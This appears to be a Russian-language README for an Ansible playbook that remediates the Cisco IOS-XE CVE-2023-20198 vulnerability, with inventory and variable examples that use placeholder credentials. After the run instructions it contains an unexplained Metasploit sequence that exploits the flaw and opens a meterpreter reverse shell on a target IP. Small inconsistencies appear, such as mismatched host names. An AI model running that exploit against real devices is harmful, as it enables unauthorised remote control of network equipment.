
Проверьте и устраните условия, делающие устройство IOS-XE уязвимым к CVE-2023-20198.
Этот репозиторий содержит Ansible плейбук для устранения уязвимости CVE-2023-20198, обнаруженной в некоторых устройствах Cisco.
Он выполняет следующее:
CVE-2023-20198-Fix/
│
├── ansible.cfg # Ansible configuration file
├── group_vars/ # Directory for variables specific to groups of hosts
│ └── iosxe_devices.yml # Variable definitions for IOS-XE devices
├── inventory.yml # Inventory of hosts, including devices to target
└── remediate.yml # Playbook for remediating CVE-2023-20198
Убедитесь, что Ansible установлен на вашей управляющей машине. Этот плейбук написан для Ansible 2.9 или новее.
Настройте Ansible: Отредактируйте ansible.cfg в соответствии с настройками вашей среды.
Обновите inventory.yml, указав данные хостов ваших устройств IOS-XE.
Определите необходимые переменные в group_vars/iosxe_devices.yml. Они должны включать общие настройки для ваших устройств IOS-XE, такие как параметры подключения и учетные данные.
Чтобы добавить новое устройство IOS-XE в инвентаризацию, отредактируйте файл inventory.yml и добавьте новый хост в соответствующую группу:
iosxe_devices:
hosts:
vulnerable_router01:
ansible_host: 192.168.1.3
# ... other necessary variables
Замените new_router01 на имя хоста вашего устройства, а переменные ansible_* на фактические значения для вашего устройства.
Если вам нужно обновить учетные данные или другие настройки для группы устройств IOS-XE, отредактируйте файл group_vars/iosxe_devices.yml:
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password # Lab use only, store credentials responsibly!
# ... other variables
Чтобы выполнить плейбук, используйте следующую команду:
ansible-playbook remediate.yml -i inventory.yml
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242 # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit



Всегда тестируйте изменения в контролируемой среде перед запуском плейбука в эксплуатацию.
Храните конфиденциальные данные, такие как пароли и секретные ключи, с помощью Ansible Vault. Не храните учетные данные в открытом виде в файлах инвентаризации или group_vars.
За дополнительными мерами безопасности и лучшими практиками обращайтесь к официальной документации Ansible.
Пожалуйста, замените все значения-заполнители на фактические данные, соответствующие вашей среде. Это README предполагает базовое знакомство с концепциями Ansible, такими как инвентаризация, переменные и запуск плейбуков.